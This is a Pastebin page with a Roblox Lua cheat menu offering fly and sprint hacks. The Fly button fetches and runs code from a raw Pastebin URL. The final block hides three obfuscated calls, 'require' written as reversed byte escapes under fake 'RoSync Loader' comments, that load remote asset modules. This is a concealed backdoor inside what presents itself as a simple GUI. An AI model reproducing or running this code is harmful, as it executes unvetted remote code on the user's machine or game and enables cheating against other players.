Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Made By Legend Handles GO SUB!
- -- Version: 1.2
- local ScreenGui = Instance.new("ScreenGui")
- local main = Instance.new("Frame")
- local TextButton = Instance.new("TextButton")
- local TextLabel = Instance.new("TextLabel")
- local aimbot = Instance.new("TextButton")
- local ImageLabel = Instance.new("ImageLabel")
- local ImageLabel_2 = Instance.new("ImageLabel")
- local speed = Instance.new("TextButton")
- --Properties:
- ScreenGui.Parent = game.CoreGui
- main.Name = "main"
- main.Parent = ScreenGui
- main.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
- main.BorderColor3 = Color3.fromRGB(0, 0, 0)
- main.BorderSizePixel = 4
- main.Position = UDim2.new(0.245916545, 0, 0.0620154962, 0)
- main.Size = UDim2.new(0, 755, 0, 397)
- main.Active = true
- main.Draggable = true
- TextButton.Parent = main
- TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
- TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
- TextButton.BorderSizePixel = 4
- TextButton.Position = UDim2.new(0.83178556, 0, -0.000484526157, 0)
- TextButton.Size = UDim2.new(0, 127, 0, 54)
- TextButton.Font = Enum.Font.SourceSans
- TextButton.Text = "CLOSE"
- TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
- TextButton.TextScaled = true
- TextButton.TextSize = 14.000
- TextButton.TextWrapped = true
- TextLabel.Parent = main
- TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
- TextLabel.BackgroundTransparency = 1.000
- TextLabel.Size = UDim2.new(0, 620, 0, 53)
- TextLabel.Font = Enum.Font.Oswald
- TextLabel.Text = "Made By Legend Handles Go SUB!"
- TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
- TextLabel.TextScaled = true
- TextLabel.TextSize = 14.000
- TextLabel.TextWrapped = true
- aimbot.Name = "aimbot"
- aimbot.Parent = main
- aimbot.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
- aimbot.BorderColor3 = Color3.fromRGB(0, 0, 0)
- aimbot.BorderSizePixel = 4
- aimbot.Position = UDim2.new(0.14172186, 0, 0.191435769, 0)
- aimbot.Size = UDim2.new(0, 178, 0, 113)
- aimbot.Font = Enum.Font.TitilliumWeb
- aimbot.Text = "Fly :)"
- aimbot.TextColor3 = Color3.fromRGB(0, 0, 0)
- aimbot.TextScaled = true
- aimbot.TextSize = 14.000
- aimbot.TextWrapped = true
- aimbot.MouseButton1Down:connect(function()
- loadstring(game:HttpGet("https://pastebin.com/raw/UXmbai5q", true))()
- end)
- ImageLabel.Parent = main
- ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
- ImageLabel.BackgroundTransparency = 1.000
- ImageLabel.Position = UDim2.new(0, 0, 0.748110831, 0)
- ImageLabel.Size = UDim2.new(0, 100, 0, 100)
- ImageLabel.Image = "rbxassetid://6864604891"
- ImageLabel_2.Parent = main
- ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
- ImageLabel_2.BackgroundTransparency = 1.000
- ImageLabel_2.Position = UDim2.new(0.830463588, 0, 0.748110831, 0)
- ImageLabel_2.Size = UDim2.new(0, 100, 0, 100)
- ImageLabel_2.Image = "rbxassetid://6864604891"
- speed.Name = "speed"
- speed.Parent = main
- speed.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
- speed.BorderColor3 = Color3.fromRGB(0, 0, 0)
- speed.BorderSizePixel = 4
- speed.Position = UDim2.new(0.609271526, 0, 0.191435769, 0)
- speed.Size = UDim2.new(0, 178, 0, 113)
- speed.Font = Enum.Font.TitilliumWeb
- speed.Text = "Shift To Sprint"
- speed.TextColor3 = Color3.fromRGB(0, 0, 0)
- speed.TextScaled = true
- speed.TextSize = 14.000
- speed.TextWrapped = true
- speed.MouseButton1Down:connect(function()
- ShiftHeld = false
- local gcheck = true
- urspeed = -1 -- The lower it is the faster. So don't worry about it being minus 1
- function ChangeFaster(inputObject, gameProcessedEvent)
- if inputObject.KeyCode == Enum.KeyCode.Minus and gameProcessedEvent == false then
- urspeed = urspeed - 0.1
- end
- end
- function ChangeSlower(inputObject, gameProcessedEvent)
- if inputObject.KeyCode == Enum.KeyCode.Equals and gameProcessedEvent == false then
- urspeed = urspeed + 0.1
- end
- end
- function GChecker(inputObject, gameProcessedEvent)
- if inputObject.KeyCode == Enum.KeyCode.K and gameProcessedEvent == false then
- if gcheck == false then
- gcheck = true
- elseif gcheck == true then
- gcheck = false
- end
- end
- end
- game:GetService("UserInputService").InputBegan:connect(GChecker)
- function PressShift(inputObject,gameProcessedEvent)
- if inputObject.KeyCode == Enum.KeyCode.LeftShift and gameProcessedEvent == false and gcheck == true then
- ShiftHeld = true
- end
- end
- function ReleaseShift(inputObject,gameProcessed)
- if inputObject.KeyCode == Enum.KeyCode.LeftShift then
- ShiftHeld = false
- end
- end
- game:GetService("UserInputService").InputBegan:connect(PressShift)
- game:GetService("UserInputService").InputEnded:connect(ReleaseShift)
- game:GetService("UserInputService").InputBegan:connect(ChangeFaster)
- game:GetService("UserInputService").InputBegan:connect(ChangeSlower)
- game:GetService('RunService').Stepped:connect(function()
- if ShiftHeld == true then
- game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,urspeed)
- end
- end)
- end)
- -- Scripts:
- local function TVQSPY_fake_script() -- TextButton.LocalScript
- local script = Instance.new('LocalScript', TextButton)
- script.Parent.MouseButton1Click:Connect(function()
- script.Parent.Parent.Visible = false
- end)
- end
- coroutine.wrap(TVQSPY_fake_script)()
- local function VWXPM_fake_script() -- nil.
- local script = Instance.new('Script', nil)
- --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5805259612)
- --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5747857292)
- --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5726091287)
- end
- coroutine.wrap(VWXPM_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement